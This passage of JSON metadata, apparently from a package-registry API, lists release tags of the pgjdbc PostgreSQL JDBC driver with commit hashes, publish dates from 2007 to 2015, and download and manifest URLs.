","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104/manifests"},{"name":"REL9_4_1204","sha":"a194c5e5429bb6edb0465b6fd254ea1d78237f54","kind":"commit","published_at":"2015-10-09T18:55:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1204","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1204","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1204","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204/manifests"},{"name":"REL9_4_1203","sha":"a0bafcd8158b1938159fb49894fa403e04238267","kind":"commit","published_at":"2015-09-17T21:10:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1203","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1203","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1203","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203/manifests"},{"name":"REL9_4_1202","sha":"8e3e868792a27625c65021f7733661614c02aaa0","kind":"commit","published_at":"2015-08-27T20:45:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1202","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1202","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1202","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202/manifests"},{"name":"REL9_4_1201","sha":"a4f8c9ecfe0cf8f162f49bdfd8db5ff0baedb233","kind":"commit","published_at":"2015-02-25T16:00:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1201","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1201","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1201","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201/manifests"},{"name":"REL9_4_1200","sha":"77ab3f6c92e931bc44ed97248ab367a4c798b687","kind":"tag","published_at":"2015-01-28T12:36:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1200","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1200","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1200","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200/manifests"},{"name":"REL9_3_1103","sha":"ed37012bb880dde1c2a8b2949dfa47bbad6d7c37","kind":"commit","published_at":"2015-01-02T20:04:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1103","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103/manifests"},{"name":"REL9_3_1102","sha":"820d560ff5ade8cd63083339d23b655ba5def6a7","kind":"tag","published_at":"2014-07-10T20:55:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1102","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102/manifests"},{"name":"REL9_3_1101","sha":"f2d036adbea166e9a6574b6ee430e81dcd6d5f7e","kind":"commit","published_at":"2014-02-18T13:50:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1101","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1101","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1101","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101/manifests"},{"name":"REL9_2_1004","sha":"38152acc7b38c74476d9f85f21216c586ada7988","kind":"tag","published_at":"2013-10-31T14:04:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1004","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1004","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1004","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004/manifests"},{"name":"REL9_3_1100","sha":"09eb20272c825cac351ba4bb8c251ed7bb5dd5d3","kind":"tag","published_at":"2013-10-31T14:02:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1100","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1100","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1100","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100/manifests"},{"name":"REL9_2_1003","sha":"947d5ab59c3bdfb43468ee5251aef1c73e91c9fd","kind":"tag","published_at":"2013-06-06T13:43:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1003","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1003","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1003","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003/manifests"},{"name":"REL9_2_1001","sha":"1cd438695dc35cf4c1453e5d225f698c28d7389e","kind":"tag","published_at":"2012-11-14T21:54:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1001","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1001","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1001","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001/manifests"},{"name":"REL9_2_1002","sha":"f9c2e98d9c80abb2b04690c8bc0c16f11a797c79","kind":"tag","published_at":"2012-11-14T21:29:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1002","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1002","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1002","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002/manifests"},{"name":"REL9_1_903","sha":"3fdf1a0f4f533a1bdf59e7e0f3e5e49656d30d5b","kind":"commit","published_at":"2012-09-27T14:08:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_903","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_903","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_903","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903/manifests"},{"name":"list","sha":"1f0403ea22970855e6a4f3164180ac7077cfebdf","kind":"commit","published_at":"2012-05-02T18:12:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/list","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/list","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@list","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list/manifests"},{"name":"REL9_1_902","sha":"557d6f329197b293b2220fb7ebf0be3709c06f88","kind":"commit","published_at":"2012-04-26T01:42:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_902","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_902","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_902","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902/manifests"},{"name":"REL9_1_901","sha":"928f33efecaf0c541b95e3c9e8404f7ba617d0eb","kind":"commit","published_at":"2011-09-11T01:38:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_901","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_901","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_901","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901/manifests"},{"name":"REL9_0_802","sha":"6b3a04fc10e71ff4affd6624a53d24b3fad20999","kind":"commit","published_at":"2011-09-11T01:18:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_802","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_802","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_802","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802/manifests"},{"name":"REL8_4_703","sha":"8f4050a1ec42b9db646193381db2a3e6bb981c75","kind":"commit","published_at":"2011-09-11T01:17:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_703","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_703","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_703","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703/manifests"},{"name":"REL8_3_607","sha":"87173901b381a34c0010b3b4d45223c40ef1c76f","kind":"commit","published_at":"2011-09-11T01:14:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_607","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_607","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_607","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607/manifests"},{"name":"REL8_2_512","sha":"2765d2fe73dcab4016950ec63857e530087464d1","kind":"commit","published_at":"2011-09-10T04:24:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_512","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_512","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_512","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512/manifests"},{"name":"REL9_0_801","sha":"2e39cc38ddc3ba8028f0acd45bad69dc4d3d691b","kind":"commit","published_at":"2010-09-20T21:32:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_801","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_801","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_801","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801/manifests"},{"name":"REL8_0_325","sha":"f7842c2feb40e7e7549f2ed54fb3df1cd4ef7386","kind":"commit","published_at":"2010-05-12T06:41:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_325","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_325","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_325","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325/manifests"},{"name":"REL8_1_415","sha":"1219f0e80e5662997d460cb28148577c71e00432","kind":"commit","published_at":"2010-05-12T06:40:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_415","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_415","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_415","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415/manifests"},{"name":"REL8_2_511","sha":"f597791a65c8c277c7cdb2a92709637352b1fde7","kind":"commit","published_at":"2010-05-12T06:40:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_511","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_511","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_511","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511/manifests"},{"name":"REL8_3_606","sha":"5e1cb768622fcf53818de0318004166d1c942587","kind":"commit","published_at":"2010-05-12T06:39:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_606","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_606","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_606","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606/manifests"},{"name":"REL8_4_702","sha":"034baa3e624ac87b11111480d1b4e35a2583a854","kind":"commit","published_at":"2010-05-12T06:36:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_702","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_702","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_702","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702/manifests"},{"name":"REL8_0_324","sha":"a69999ff3b80ceb3777817d08496468edc725765","kind":"commit","published_at":"2009-07-01T05:16:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_324","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_324","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_324","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324/manifests"},{"name":"REL8_1_414","sha":"ca013de95da92dadb9fafc940029fe15757ae2af","kind":"commit","published_at":"2009-07-01T05:16:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_414","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_414","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_414","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414/manifests"},{"name":"REL8_2_510","sha":"a722ade8395fb287471001e0246f190a2b859552","kind":"commit","published_at":"2009-07-01T05:16:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_510","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_510","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_510","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510/manifests"},{"name":"REL8_3_605","sha":"577936d8d7f7e9a1b6c7d725a96513a9b19498e3","kind":"commit","published_at":"2009-07-01T05:16:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_605","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_605","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_605","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605/manifests"},{"name":"REL8_4_701","sha":"05af6314b92554e30034d49426b941ce621f9dee","kind":"commit","published_at":"2009-07-01T05:15:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_701","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_701","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_701","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701/manifests"},{"name":"REL8_0_323","sha":"f2873cda04abcfb05695501c88dbee6bcd41d046","kind":"commit","published_at":"2008-11-16T13:46:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_323","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_323","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_323","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323/manifests"},{"name":"REL8_1_413","sha":"2eb09ad9c7b2fddc88b4a87598f3734d4d2b433e","kind":"commit","published_at":"2008-11-16T13:45:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_413","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_413","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_413","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413/manifests"},{"name":"REL8_2_509","sha":"3b35c0939abce6f600d19312c644475db6d0d4bd","kind":"commit","published_at":"2008-11-16T13:45:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_509","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_509","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_509","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509/manifests"},{"name":"REL8_3_604","sha":"f8e3280f3cee126b0ad765fbdac92b40b784d469","kind":"commit","published_at":"2008-11-16T13:45:43.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_604","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_604","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_604","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604/manifests"},{"name":"REL8_0_322","sha":"b3bc99ec992aa793817539a726416ed8c8df38cc","kind":"commit","published_at":"2008-01-31T09:55:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_322","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_322","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_322","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322/manifests"},{"name":"REL8_1_412","sha":"c29d8b99429462a17d7ba0b8e8f6daedab92e80e","kind":"commit","published_at":"2008-01-31T09:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_412","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_412","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_412","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412/manifests"},{"name":"REL8_2_508","sha":"2566771421d25f8b674a932e182e671504ce0480","kind":"commit","published_at":"2008-01-31T09:55:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_508","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_508","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_508","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508/manifests"},{"name":"REL8_3_603","sha":"8a2eef81e45d07130e2d86bc8a18cc14642e2741","kind":"commit","published_at":"2008-01-31T09:54:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_603","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_603","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_603","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603/manifests"},{"name":"REL8_0_321","sha":"4d7ea8b0061ef946705cbd46ee70cb5984f3a5e7","kind":"commit","published_at":"2007-12-02T08:31:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_321","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_321","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_321","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321/manifests"},{"name":"REL8_1_411","sha":"4f487c433534b25222a81f7e80394ef3d52d72fe","kind":"commit","published_at":"2007-12-02T08:30:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_411","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_411","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_411","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411/manifests"},{"name":"REL8_2_507","sha":"9f13dae31b5fdf75abd1552ec590749bf09e052d","kind":"commit","published_at":"